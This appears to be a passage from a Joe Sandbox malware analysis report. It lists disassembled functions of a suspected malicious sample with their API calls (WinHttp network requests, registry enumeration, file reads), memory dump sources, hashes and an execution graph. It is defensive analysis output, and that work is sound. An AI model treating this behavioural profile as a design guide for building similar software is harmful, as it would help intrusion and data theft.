                                                                                                          • EnterCriticalSection.KERNEL32(?,F6D10407), ref: 6F0376AD
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,F6D10407), ref: 6F0376FF
                                                                                                          • EnterCriticalSection.KERNEL32(F6D10407,?,?,?,F6D10407), ref: 6F03770D
                                                                                                          • LeaveCriticalSection.KERNEL32(F6D10407,?,00000000,?,?,?,?,F6D10407), ref: 6F03772A
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                            • Part of subcall function 6F036D40: _rand.LIBCMT ref: 6F036DEA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                                                          • String ID:
                                                                                                          • API String ID: 119520971-0
                                                                                                          • Opcode ID: 651fa0dfa6902b2bdf2003bdccf55a88be223eb98d858d44050c2b59dda62b9f
                                                                                                          • Instruction ID: 7281bae88c24dc69096d543e90f383811b38117a99906d31198eb1caae325584
                                                                                                          • Opcode Fuzzy Hash: 651fa0dfa6902b2bdf2003bdccf55a88be223eb98d858d44050c2b59dda62b9f
                                                                                                          • Instruction Fuzzy Hash: 83219276904A19EBCB10DF54CD44F9FB7BCFF41254F00462AE81697680EB70BA15DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F039580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?), ref: 6F0395A9
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6F0395CA
                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6F0395DA
                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6F0395FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3168844106-0
                                                                                                          • Opcode ID: c9e35f59b05c06d48ee3c58692f77b68b2c42823858bbdac214c73075632535c
                                                                                                          • Instruction ID: 057f30af0ff22887320cf8bb10f7e8ce9b2225b91654a72e33218832023349cf
                                                                                                          • Opcode Fuzzy Hash: c9e35f59b05c06d48ee3c58692f77b68b2c42823858bbdac214c73075632535c
                                                                                                          • Instruction Fuzzy Hash: 40115937904629EBCB00CE99E880EDEF7B9FF51620B01419AE51597611DB70FA619BA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:6%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:3.7%
                                                                                                          Total number of Nodes:518
                                                                                                          Total number of Limit Nodes:12
                                                                                                          execution_graph 34199 43f0c0 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 34182 41bc45 105 API calls 33790 402748 33791 40275b 33790->33791 33796 40869c 33791->33796 33793 4027a8 33795 402767 33795->33793 33800 401bff 15 API calls _strlen 33795->33800 33797 4086fe 33796->33797 33798 408743 33796->33798 33799 4532ef 15 API calls 33797->33799 33798->33795 33799->33798 33800->33795 34216 45ff4e 42 API calls __wfreopen_s 34184 45184b 7 API calls __wsopen_s 34240 4513cb FreeLibrary 34217 43e54c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 33529 43e3d0 33530 43e3dc ___scrt_is_nonwritable_in_current_image 33529->33530 33555 43e67b 33530->33555 33532 43e3e3 33533 43e536 33532->33533 33544 43e40d ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 33532->33544 33574 43e955 4 API calls 2 library calls 33533->33574 33535 43e53d 33567 4484d6 33535->33567 33539 43e54b 33540 43e42c 33541 43e4ad 33563 43e8ce GetStartupInfoW __fread_nolock 33541->33563 33543 43e4b3 33564 42dcb6 33543->33564 33544->33540 33544->33541 33570 448520 41 API calls 3 library calls 33544->33570 33556 43e684 33555->33556 33576 43eb78 IsProcessorFeaturePresent 33556->33576 33558 43e690 33577 43f082 10 API calls 2 library calls 33558->33577 33560 43e695 33561 43e699 33560->33561 33578 43f0a1 7 API calls 2 library calls 33560->33578 33561->33532 33563->33543 33579 42dc48 33564->33579 33680 44868c 33567->33680 33570->33541 33574->33535 33575 4484ec 23 API calls _unexpected 33575->33539 33576->33558 33577->33560 33578->33561 33584 40a878 33579->33584 33581 42dc50 33583 42dcab 33581->33583 33598 41e91b 33581->33598 33585 40a89f ___std_exception_copy 33584->33585 33586 40aae0 33585->33586 33587 40b3d7 FindCloseChangeNotification 33585->33587 33588 40b0da GetFileSizeEx 33585->33588 33589 40ab23 ReadFile CloseHandle 33585->33589 33590 40abbc GetModuleFileNameW CreateFileW 33585->33590 33592 40b4ee 33585->33592 33593 40b4c1 ExitProcess 33585->33593 33597 40a878 17 API calls 33585->33597 33603 44c77c 33585->33603 33586->33585 33591 40b528 17 API calls 33586->33591 33596 40a878 17 API calls 33586->33596 33587->33585 33588->33585 33589->33585 33590->33585 33591->33586 33592->33581 33596->33586 33597->33585 33613 41de1f 33598->33613 33600 41e9f2 33600->33581 33601 41e929 33601->33600 33602 41ea15 97 API calls 33601->33602 33602->33601 33606 4529a4 33603->33606 33607 44c794 33606->33607 33608 4529af RtlFreeHeap 33606->33608 33607->33585 33608->33607 33609 4529c4 GetLastError 33608->33609 33610 4529d1 __dosmaperr 33609->33610 33612 449426 14 API calls __dosmaperr 33610->33612 33612->33607 33630 41de4f __fread_nolock __fprintf_l _strlen 33613->33630 33614 41e76a WinHttpConnect 33614->33630 33615 41e861 WinHttpSendRequest 33615->33630 33616 41e42c WinHttpReceiveResponse 33616->33630 33618 41e4fa WinHttpCloseHandle 33618->33630 33619 41e711 WinHttpCloseHandle 33619->33630 33622 41dfdb WinHttpOpen 33622->33630 33623 41e8f8 33623->33601 33624 41e8b5 33643 41bfbd 108 API calls 33624->33643 33625 41e1c3 WinHttpCloseHandle 33625->33630 33628 41debe WinHttpOpenRequest 33628->33630 33630->33614 33630->33615 33630->33616 33630->33618 33630->33619 33630->33622 33630->33623 33630->33624 33630->33625 33630->33628 33632 4139a5 33630->33632 33635 44cb2f 33630->33635 33639 418b75 105 API calls 33630->33639 33640 41ad23 78 API calls __fread_nolock 33630->33640 33641 419bc3 47 API calls 33630->33641 33642 41bc9c 46 API calls 33630->33642 33644 44ce81 33632->33644 33636 44cb42 __wfreopen_s 33635->33636 33668 44cd6e 33636->33668 33638 44cb5a __wfreopen_s 33638->33630 33639->33630 33640->33630 33641->33630 33642->33630 33643->33623 33645 45b797 33644->33645 33646 45b7a4 33645->33646 33647 45b7af 33645->33647 33657 4532ef 33646->33657 33648 45b7b7 33647->33648 33655 45b7c0 _unexpected 33647->33655 33650 4529a4 __freea 14 API calls 33648->33650 33653 4139b8 33650->33653 33651 45b7c5 33664 449426 14 API calls __dosmaperr 33651->33664 33652 45b7ea RtlReAllocateHeap 33652->33653 33652->33655 33653->33630 33655->33651 33655->33652 33665 452ce0 EnterCriticalSection LeaveCriticalSection _unexpected 33655->33665 33658 45332d 33657->33658 33662 4532fd _unexpected 33657->33662 33667 449426 14 API calls __dosmaperr 33658->33667 33659 453318 RtlAllocateHeap 33661 45332b 33659->33661 33659->33662 33661->33653 33662->33658 33662->33659 33666 452ce0 EnterCriticalSection LeaveCriticalSection _unexpected 33662->33666 33664->33653 33665->33655 33666->33662 33667->33661 33669 44cd81 33668->33669 33670 44cd85 33669->33670 33672 44cdad 33669->33672 33677 452c03 29 API calls 2 library calls 33670->33677 33675 44cdd2 33672->33675 33678 44cba3 43 API calls 2 library calls 33672->33678 33676 44cda3 33675->33676 33679 452c03 29 API calls 2 library calls 33675->33679 33676->33638 33677->33676 33678->33675 33679->33676 33681 4486b9 33680->33681 33682 4486cb 33680->33682 33707 448555 GetModuleHandleW 33681->33707 33692 44880e 33682->33692 33685 4486be 33685->33682 33708 448598 GetModuleHandleExW 33685->33708 33687 43e543 33687->33575 33690 44871d 33693 44881a ___scrt_is_nonwritable_in_current_image 33692->33693 33714 4518bd EnterCriticalSection 33693->33714 33695 448824 33715 448723 33695->33715 33697 448831 33719 44884f 33697->33719 33700 44863c 33724 44861a 33700->33724 33703 44865a 33705 448598 _unexpected 3 API calls 33703->33705 33704 44864a GetCurrentProcess TerminateProcess 33704->33703 33706 448662 ExitProcess 33705->33706 33707->33685 33709 4485d7 GetProcAddress 33708->33709 33710 4485f8 33708->33710 33709->33710 33711 4485eb 33709->33711 33712 448607 33710->33712 33713 4485fe FreeLibrary 33710->33713 33711->33710 33712->33682 33713->33712 33714->33695 33716 44872f ___scrt_is_nonwritable_in_current_image 33715->33716 33718 448796 _unexpected 33716->33718 33722 4490f1 14 API calls 2 library calls 33716->33722 33718->33697 33723 4518d4 LeaveCriticalSection 33719->33723 33721 448702 33721->33687 33721->33700 33722->33718 33723->33721 33729 454295 6 API calls _unexpected 33724->33729 33726 44861f 33727 448624 GetPEB 33726->33727 33728 448636 33726->33728 33727->33728 33728->33703 33728->33704 33729->33726 34241 4521d2 51 API calls 34244 4179e0 78 API calls __fread_nolock 34246 41d7e3 108 API calls ___vcrt_freefls@4 34248 4023e9 46 API calls 34203 44a0e8 49 API calls 34204 4518eb GetProcessHeap 34186 43ea73 51 API calls _unexpected 34218 452574 LeaveCriticalSection _unexpected 34205 43e4f1 14 API calls 34207 4518fd 16 API calls __dosmaperr 34220 45317e 75 API calls 3 library calls 34208 441af8 7 API calls ___scrt_uninitialize_crt 34221 41bb7f 118 API calls 2 library calls 34188 448805 41 API calls _unexpected 33730 44a000 33743 457a3a GetEnvironmentStringsW 33730->33743 33732 44a011 33733 44a017 33732->33733 33734 44a023 33732->33734 33735 4529a4 __freea 14 API calls 33733->33735 33750 44a114 33734->33750 33737 44a01d 33735->33737 33739 4529a4 __freea 14 API calls 33740 44a047 33739->33740 33741 4529a4 __freea 14 API calls 33740->33741 33742 44a04d 33741->33742 33744 457a49 33743->33744 33745 457a4b 33743->33745 33744->33732 33746 4532ef __fread_nolock 15 API calls 33745->33746 33747 457a60 __fprintf_l 33746->33747 33748 4529a4 __freea 14 API calls 33747->33748 33749 457a7a FreeEnvironmentStringsW 33748->33749 33749->33732 33754 44a133 33750->33754 33753 44a17b 33755 4529a4 __freea 14 API calls 33753->33755 33754->33754 33772 454ab0 33754->33772 33771 44a02a 33755->33771 33756 44a1fa 33757 4529a4 __freea 14 API calls 33756->33757 33757->33771 33758 454ab0 _unexpected 14 API calls 33762 44a185 33758->33762 33759 44a20a 33780 44a0b9 14 API calls __freea 33759->33780 33762->33756 33762->33758 33762->33759 33764 44a225 33762->33764 33768 4529a4 __freea 14 API calls 33762->33768 33779 455d11 29 API calls 2 library calls 33762->33779 33763 44a210 33765 4529a4 __freea 14 API calls 33763->33765 33781 452a87 11 API calls _unexpected 33764->33781 33766 44a218 33765->33766 33769 4529a4 __freea 14 API calls 33766->33769 33768->33762 33769->33771 33770 44a231 33771->33739 33777 454abd _unexpected 33772->33777 33773 454ae8 RtlAllocateHeap 33775 44a173 33773->33775 33773->33777 33774 454afd 33783 449426 14 API calls __dosmaperr 33774->33783 33775->33753 33775->33762 33777->33773 33777->33774 33782 452ce0 EnterCriticalSection LeaveCriticalSection _unexpected 33777->33782 33779->33762 33780->33763 33781->33770 33782->33777 33783->33775 34225 43e505 24 API calls _unexpected 34226 41b106 125 API calls 33801 405f88 33825 405fa1 __fprintf_l _unexpected ___std_exception_copy _strlen 33801->33825 33802 407b93 lstrcatW 33802->33825 33803 406a91 lstrcatW 33803->33825 33804 40723e lstrcatW 33878 41eef6 33804->33878 33806 44ce81 16 API calls 33806->33825 33818 44c77c 14 API calls ___vcrt_freefls@4 33818->33825 33819 406cdf lstrcatW 33819->33825 33820 407cce 33821 407016 lstrcatW lstrcatW 33821->33825 33822 407982 lstrcatW 33822->33825 33823 40281b 15 API calls 33823->33825 33825->33802 33825->33803 33825->33804 33825->33806 33825->33818 33825->33819 33825->33820 33825->33821 33825->33822 33825->33823 33827 406fcc lstrcatW 33825->33827 33828 402bfc 33825->33828 33843 40e568 33825->33843 33852 403e89 33825->33852 33868 402272 99 API calls 33825->33868 33869 4027de 46 API calls 33825->33869 33870 40285a 15 API calls 33825->33870 33871 4022dd 46 API calls 33825->33871 33872 402a26 46 API calls 33825->33872 33873 43b928 33825->33873 33884 40223f 46 API calls 33825->33884 33885 401241 44 API calls 33825->33885 33886 40eb3a 33825->33886 33891 44cb6c 43 API calls __wfreopen_s 33825->33891 33827->33825 33836 402c0e __fprintf_l ___std_exception_copy 33828->33836 33829 44c77c 14 API calls ___vcrt_freefls@4 33829->33836 33831 40e568 24 API calls 33831->33836 33836->33829 33836->33831 33838 4039d1 33836->33838 33839 401241 44 API calls 33836->33839 33842 43b928 lstrcmpiW GetPEB 33836->33842 33892 401a08 46 API calls _strlen 33836->33892 33893 40129f 44 API calls 33836->33893 33894 402272 99 API calls 33836->33894 33895 402217 46 API calls 33836->33895 33896 4022dd 46 API calls 33836->33896 33897 40116d 100 API calls 33836->33897 33898 401270 100 API calls 33836->33898 33899 40248f 46 API calls 33836->33899 33838->33825 33839->33836 33842->33836 33851 40e581 __fprintf_l _unexpected ___std_exception_copy 33843->33851 33844 40d60c 23 API calls 33844->33851 33845 40ea66 NtReadFile 33845->33851 33846 40eb6b 23 API calls 33846->33851 33847 40eb27 33847->33825 33848 40e568 23 API calls 33848->33851 33849 40eb3a 23 API calls 33849->33851 33850 43b928 lstrcmpiW GetPEB 33850->33851 33851->33844 33851->33845 33851->33846 33851->33847 33851->33848 33851->33849 33851->33850 33853 403ea2 _unexpected 33852->33853 33855 40421f lstrcatW 33853->33855 33856 404678 lstrcatW lstrcatW 33853->33856 33857 4046ae 33853->33857 33858 40e568 24 API calls 33853->33858 33860 404083 lstrcatW 33853->33860 33861 44c77c 14 API calls ___vcrt_freefls@4 33853->33861 33863 40458b lstrcatW lstrcatW 33853->33863 33865 404555 lstrcatW 33853->33865 33866 41eef6 101 API calls 33853->33866 33867 403ff6 lstrcatW 33853->33867 33900 4039e8 33853->33900 33911 40116d 100 API calls 33853->33911 33912 401a08 46 API calls _strlen 33853->33912 33913 4021c5 46 API calls 33853->33913 33855->33853 33856->33853 33857->33825 33858->33853 33860->33853 33861->33853 33863->33853 33865->33853 33866->33853 33867->33853 33868->33825 33869->33825 33870->33825 33871->33825 33872->33825 33875 43b944 33873->33875 33874 43ba15 lstrcmpiW GetPEB 33874->33875 33875->33874 33876 43ba04 33875->33876 33931 43d47b lstrcmpiW GetPEB __fprintf_l 33875->33931 33876->33825 33881 41ef10 33878->33881 33882 41efbf 33881->33882 33932 41b8c2 33881->33932 33938 41b447 33881->33938 33941 41ea15 33881->33941 33882->33825 33884->33825 33885->33825 34152 40d60c 33886->34152 33889 43b928 2 API calls 33890 40eb5c 33889->33890 33890->33825 33891->33825 33892->33836 33893->33836 33894->33836 33895->33836 33896->33836 33897->33836 33898->33836 33899->33836 33906 403a04 __fprintf_l _unexpected 33900->33906 33901 403ca4 lstrcatW 33901->33906 33902 403cc9 lstrcatW lstrcatW 33902->33906 33903 403d76 lstrcatW 33903->33906 33904 403e51 33914 4118b6 33904->33914 33905 403d45 lstrcatW lstrcatW 33905->33906 33906->33901 33906->33902 33906->33903 33906->33904 33906->33905 33908 403da2 lstrcatW lstrcatW 33906->33908 33930 402542 15 API calls _strlen 33906->33930 33908->33906 33911->33853 33912->33853 33913->33853 33927 4118da __fprintf_l _unexpected 33914->33927 33915 413336 lstrcatW 33915->33927 33916 412c9c lstrcatW 33923 4118b6 125 API calls 33916->33923 33917 412da7 lstrcatW lstrcatW 33917->33927 33918 40e568 24 API calls 33918->33927 33919 411e65 lstrcatW 33919->33927 33920 4118b6 125 API calls 33920->33927 33921 4123fd lstrcatW 33921->33927 33922 403e81 33922->33853 33923->33927 33924 40eb6b 24 API calls 33924->33927 33925 4110b8 125 API calls 33925->33927 33926 41eef6 101 API calls 33926->33927 33927->33915 33927->33916 33927->33917 33927->33918 33927->33919 33927->33920 33927->33921 33927->33922 33927->33924 33927->33925 33927->33926 33928 44c77c 14 API calls ___vcrt_freefls@4 33927->33928 33929 43b928 2 API calls 33927->33929 33928->33927 33929->33927 33930->33906 33931->33875 33933 41b8e0 _strlen 33932->33933 33934 41b9da 33932->33934 33937 41b969 33933->33937 33948 41a772 33933->33948 33934->33881 33935 44c77c ___vcrt_freefls@4 14 API calls 33935->33934 33937->33934 33937->33935 34135 41b45a 33938->34135 33940 41b456 33940->33881 33942 41ea33 _unexpected 33941->33942 33943 41ed1c WideCharToMultiByte 33942->33943 33944 41ec45 WideCharToMultiByte 33942->33944 33946 41edb4 33942->33946 33947 44c77c ___vcrt_freefls@4 14 API calls 33942->33947 34151 419771 95 API calls 2 library calls 33942->34151 33943->33942 33944->33942 33946->33881 33947->33942 33951 44a3e1 33948->33951 33950 41a797 33950->33937 33952 44a3ec 33951->33952 33953 44a3fc 33952->33953 33954 44a40f 33952->33954 33997 449426 14 API calls __dosmaperr 33953->33997 33956 44a421 33954->33956 33963 44a434 33954->33963 33999 449426 14 API calls __dosmaperr 33956->33999 33957 44a401 33998 452a77 29 API calls __wfreopen_s 33957->33998 33959 44a465 33989 45822e 33959->33989 33961 44a426 34000 452a77 29 API calls __wfreopen_s 33961->34000 33962 44a454 34001 449426 14 API calls __dosmaperr 33962->34001 33963->33959 33963->33962 33969 44a47c 33970 44a670 33969->33970 34009 457ebd 33969->34009 34028 452a87 11 API calls _unexpected 33970->34028 33973 44a67a 33974 44a48e 33974->33970 34016 457ee9 33974->34016 33976 44a4a0 33976->33970 33977 44a4a9 33976->33977 33978 44a52e 33977->33978 33980 44a4ca 33977->33980 34026 457f50 29 API calls 3 library calls 33978->34026 34023 457f50 29 API calls 3 library calls 33980->34023 33981 44a535 33988 44a40b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 33981->33988 34027 4581da 29 API calls 2 library calls 33981->34027 33983 44a4e2 33983->33988 34024 4581da 29 API calls 2 library calls 33983->34024 33986 44a4fb 33986->33988 34025 457f50 29 API calls 3 library calls 33986->34025 33988->33950 33990 45823a ___scrt_is_nonwritable_in_current_image 33989->33990 33991 44a46a 33990->33991 34029 4518bd EnterCriticalSection 33990->34029 34002 457e91 33991->34002 33993 45824b 33994 45825f 33993->33994 34030 458777 33993->34030 34042 458282 LeaveCriticalSection _unexpected 33994->34042 33997->33957 33998->33988 33999->33961 34000->33988 34001->33988 34003 457eb2 34002->34003 34004 457e9d 34002->34004 34003->33969 34129 449426 14 API calls __dosmaperr 34004->34129 34006 457ea2 34130 452a77 29 API calls __wfreopen_s 34006->34130 34008 457ead 34008->33969 34010 457ede 34009->34010 34011 457ec9 34009->34011 34010->33974 34131 449426 14 API calls __dosmaperr 34011->34131 34013 457ece 34132 452a77 29 API calls __wfreopen_s 34013->34132 34015 457ed9 34015->33974 34017 457ef5 34016->34017 34018 457f0a 34016->34018 34133 449426 14 API calls __dosmaperr 34017->34133 34018->33976 34020 457efa 34134 452a77 29 API calls __wfreopen_s 34020->34134 34022 457f05 34022->33976 34023->33983 34024->33986 34025->33988 34026->33981 34027->33988 34028->33973 34029->33993 34043 45828b 34030->34043 34033 4587d3 34061 458344 34033->34061 34035 4587ca 34055 4584e5 34035->34055 34036 4587d0 34038 4529a4 __freea 14 API calls 34036->34038 34039 4587de 34038->34039 34084 43ed58 5 API calls ___raise_securityfailure 34039->34084 34041 4587eb 34041->33994 34042->33991 34085 45ff94 34043->34085 34046 4532ef __fread_nolock 15 API calls 34047 4582cb 34046->34047 34048 4582d2 34047->34048 34049 45ff94 42 API calls 34047->34049 34050 4529a4 __freea 14 API calls 34048->34050 34051 4582ea 34049->34051 34052 4582b1 34050->34052 34051->34048 34053 4582f4 34051->34053 34052->34033 34052->34035 34054 4529a4 __freea 14 API calls 34053->34054 34054->34052 34056 4584f5 34055->34056 34057 457ee9 29 API calls 34056->34057 34058 458516 34057->34058 34124 452a87 11 API calls _unexpected 34058->34124 34060 458776 34062 458354 34061->34062 34063 457ee9 29 API calls 34062->34063 34064 458371 34063->34064 34065 458493 34064->34065 34067 457e91 29 API calls 34064->34067 34128 452a87 11 API calls _unexpected 34065->34128 34069 458383 34067->34069 34068 45849d 34069->34065 34070 457ebd 29 API calls 34069->34070 34071 458395 34070->34071 34071->34065 34072 45839e 34071->34072 34073 4529a4 __freea 14 API calls 34072->34073 34074 4583a9 GetTimeZoneInformation 34073->34074 34075 4583c5 34074->34075 34076 458470 34074->34076 34077 4583f9 __fread_nolock 34075->34077 34076->34036 34125 455a58 41 API calls 2 library calls 34077->34125 34079 458448 34126 458302 43 API calls 4 library calls 34079->34126 34081 458459 34127 458302 43 API calls 4 library calls 34081->34127 34083 45846d 34083->34076 34084->34041 34086 45ff9f ___scrt_is_nonwritable_in_current_image 34085->34086 34093 4518bd EnterCriticalSection 34086->34093 34088 45ffb6 34094 460082 34088->34094 34093->34088 34095 460092 34094->34095 34096 4600a8 34094->34096 34116 449426 14 API calls __dosmaperr 34095->34116 34098 4600d7 34096->34098 34099 4600be 34096->34099 34120 45fffe 42 API calls 34098->34120 34118 449426 14 API calls __dosmaperr 34099->34118 34100 460097 34117 452a77 29 API calls __wfreopen_s 34100->34117 34103 4600c9 34119 452a77 29 API calls __wfreopen_s 34103->34119 34106 45ffcc 34113 45fff5 34106->34113 34107 4600e8 34107->34106 34121 455d11 29 API calls 2 library calls 34107->34121 34109 460120 34109->34106 34110 46012e 34109->34110 34122 452a87 11 API calls _unexpected 34110->34122 34112 46013a 34123 4518d4 LeaveCriticalSection 34113->34123 34115 4582aa 34115->34046 34115->34052 34116->34100 34117->34106 34118->34103 34119->34106 34120->34107 34121->34109 34122->34112 34123->34115 34124->34060 34125->34079 34126->34081 34127->34083 34128->34068 34129->34006 34130->34008 34131->34013 34132->34015 34133->34020 34134->34022 34136 41b471 _strlen 34135->34136 34147 41b52b 34135->34147 34137 44c77c ___vcrt_freefls@4 14 API calls 34136->34137 34138 41b4b6 34136->34138 34136->34147 34137->34138 34139 41b4eb 34138->34139 34142 41b5ab 34138->34142 34138->34147 34146 41b520 34139->34146 34150 4180c5 46 API calls 34139->34150 34141 44c77c ___vcrt_freefls@4 14 API calls 34141->34147 34142->34146 34148 44add1 GetSystemTimeAsFileTime 34142->34148 34144 41b6c0 34145 41a772 46 API calls 34144->34145 34145->34146 34146->34141 34146->34147 34147->33940 34149 44ae0a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34148->34149 34149->34144 34150->34146 34151->33942 34161 40d61e __fprintf_l _unexpected 34152->34161 34153 40e201 lstrlenW 34153->34161 34154 40df31 NtCreateFile 34154->34161 34155 40e555 34155->33889 34155->33890 34156 40eb6b 19 API calls 34156->34161 34157 40eb3a 19 API calls 34157->34161 34158 43b928 lstrcmpiW GetPEB 34158->34161 34159 40dc0a lstrcatW lstrcatW lstrlenW 34159->34161 34160 40e568 19 API calls 34160->34161 34161->34153 34161->34154 34161->34155 34161->34156 34161->34157 34161->34158 34161->34159 34161->34160 34162 40d60c 19 API calls 34161->34162 34162->34161 34227 43e30b 58 API calls __RTC_Initialize 34166 40818a 34167 408198 34166->34167 34168 40819c 34167->34168 34170 4081f2 34167->34170 34174 4532ef 15 API calls 34170->34174 34171 4082e9 __fprintf_l 34171->34168 34172 40820a 34172->34171 34173 4532ef 15 API calls 34172->34173 34173->34171 34174->34172 34251 451f8f 15 API calls 34190 42dc09 45 API calls 34228 43f110 6 API calls 3 library calls 34192 44d010 20 API calls 34193 45e413 57 API calls 3 library calls 34163 413998 34164 44c77c ___vcrt_freefls@4 14 API calls 34163->34164 34165 4139a1 34164->34165 34209 45849e 29 API calls __wsopen_s 33784 401924 33788 4532ef 15 API calls 33784->33788 33785 40192e 33786 40194d 33785->33786 33789 401967 15 API calls 33785->33789 33788->33785 33789->33786 34231 452121 GetCommandLineA GetCommandLineW 34232 41b325 96 API calls 2 library calls 34233 451f2f 34 API calls 2 library calls 34254 4545ae 56 API calls 2 library calls 34196 40102d 44 API calls 34235 418b2e 71 API calls 34211 4198b3 72 API calls 34256 418bb3 46 API calls _strlen 34212 4530b6 15 API calls 3 library calls 34214 45aab0 15 API calls 34175 43e3be 34180 43e949 SetUnhandledExceptionFilter 34175->34180 34177 43e3c3 34181 44ada2 29 API calls 2 library calls 34177->34181 34179 43e3ce 34180->34177 34181->34179

                                                                                                          Executed Functions

                                                                                                          Function 00432130 Relevance: 39.5, APIs: 11, Strings: 11, Instructions: 1027registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wsprintfW.USER32 ref: 004321E8
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00432354
                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,?,?,?,?,?,?,0042934A,?), ref: 004324FC
                                                                                                          • wsprintfW.USER32 ref: 004327EC
                                                                                                          • RegEnumKeyExW.KERNEL32 ref: 00432876
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00432EF3
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00432EF8
                                                                                                          • _strlen.LIBCMT ref: 00432F2F
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00432F49
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Close$wsprintf$EnumOpen_strlen
                                                                                                          • String ID: BbA$?$Z-/M$[-/M$[-/M$_wJl$`wJl$`wJl$s^Xr$t^Xr$t^Xr
                                                                                                          • API String ID: 4237616888-3247521511
                                                                                                          • Opcode ID: ab8525394ccd318c760f46afa7d06232f35db9c3b9feb6d71739b52659e3b4de
                                                                                                          • Instruction ID: ecf74252d7c328f2710fa7a4ed189e72928217706fe12092d021441dd80da1dd
                                                                                                          • Opcode Fuzzy Hash: ab8525394ccd318c760f46afa7d06232f35db9c3b9feb6d71739b52659e3b4de
                                                                                                          • Instruction Fuzzy Hash: FD82E571D0410A9BDF289F98CE4667E76B0FB1C300F24652BE515EB394D7B98A418B8B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004118B6 Relevance: 29.7, APIs: 6, Strings: 10, Instructions: 1744stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(778182B0,7B829D7E), ref: 00411E6B
                                                                                                          • lstrcatW.KERNEL32(778182B0,?), ref: 00412403
                                                                                                          • lstrcatW.KERNEL32(?,8410C221), ref: 0041333C
                                                                                                          Strings
                                                                                                          Memory Dump Source
